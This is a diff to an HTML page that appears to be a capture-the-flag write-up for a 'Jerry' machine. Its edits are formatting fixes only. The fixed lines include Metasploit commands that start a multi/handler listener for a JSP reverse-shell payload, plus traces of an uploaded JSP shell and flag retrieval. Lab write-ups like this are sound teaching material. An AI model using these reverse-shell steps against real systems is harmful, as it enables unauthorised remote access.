--- a/content/jerry.html
+++ b/content/jerry.html
@@ -54,7 +54,7 @@
 					<nav class="navbar navbar-default">
 						<div class="container-fluid">
 							<div class="collapse navbar-collapse" id="navbar" style="min-width: 110px;border:none;margin-left:2%">
-								<p>General<p>
+								<p>General</p>
 								<ul class="nav navbar-nav">
 									<li><a href="../index.html">HOME</a></li>
 									<li><a href="../readme.html">README.TXT</a></li>
@@ -221,12 +221,12 @@ inflated: djkwbjspxeqxnor.jsp
 									<p>Commands used:</p>
 									<code>
 root@kali: msfconsole
-msf>use exploit multi/handler
-msf>set payload java/jsp_shell_reverse_tcp
-msf>set LHOST &lt;local IP&gt;
-msf>set LPORT &lt;local port&gt;
+msf> use exploit multi/handler
+msf> set payload java/jsp_shell_reverse_tcp
+msf> set LHOST &lt;local IP&gt;
+msf> set LPORT &lt;local port&gt;
 msf> set ExitOnSession false
-msf>exploit -j
+msf> exploit -j
 									</code>
 									<br />
 									<p>The -j parameter will keep the connected session in the background.</p>
@@ -273,7 +273,6 @@ C:\Users\Administrator\Desktop\flags>more &quot;2 for the price of 1.txt&quot;
 				<!-- SCRIPTS -->
 				<!-- END OF SCRIPTS -->
 			</div>
-		</div>
 	<!-- END OF BODY -->
 	</body>
 <!-- InstanceEnd --></html>
